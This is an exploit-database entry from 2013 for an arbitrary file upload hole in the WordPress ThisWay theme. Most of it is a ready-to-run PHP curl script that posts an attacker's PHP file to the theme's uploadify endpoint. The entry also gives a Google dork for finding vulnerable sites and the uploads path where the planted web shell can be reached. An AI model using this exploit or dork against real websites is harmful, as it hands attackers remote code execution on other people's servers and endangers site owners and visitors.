WordPress ThisWay Shell Upload Vulnerability

2013-11-05T00:00:00
ID 1337DAY-ID-21462
Type zdt
Reporter Bet0
Modified 2013-11-05T00:00:00

Description

WordPress ThisWay theme suffers from a remote shell upload vulnerability.

                                        
                                            ########################################################################################
#Exploit title: WordPress ThisWay theme - Arbitrary File Upload Vulnerability
#Author: Bet0
#Google Dork: inurl:"/wp-content/themes/ThisWay/"
#Date:1 November 2013    
#Vendor Homepage: http://themeforest.net/
#Themes Link: http://www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/
#Tested on: Windows 7     
########################################################################################

[+]EXPLOIT

<?php
$uploadfile="upl.php";
$ch = curl_init("http://[localcrot]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

[+]SHELL ACCSES
http://[localcrot]/wp-content/uploads/[year]/[month]/[search your shell].php

[+]Twitter: https://twitter.com/Defacto_ID

[+]REGARDS To:
All member Sund4nyM0uz Corporation,Explore Crew, Trackc0de Crew, Malang Cyber Crew, Indonesian Coder, HN-Community, and My Girl :*

#  0day.today [2018-04-15]  #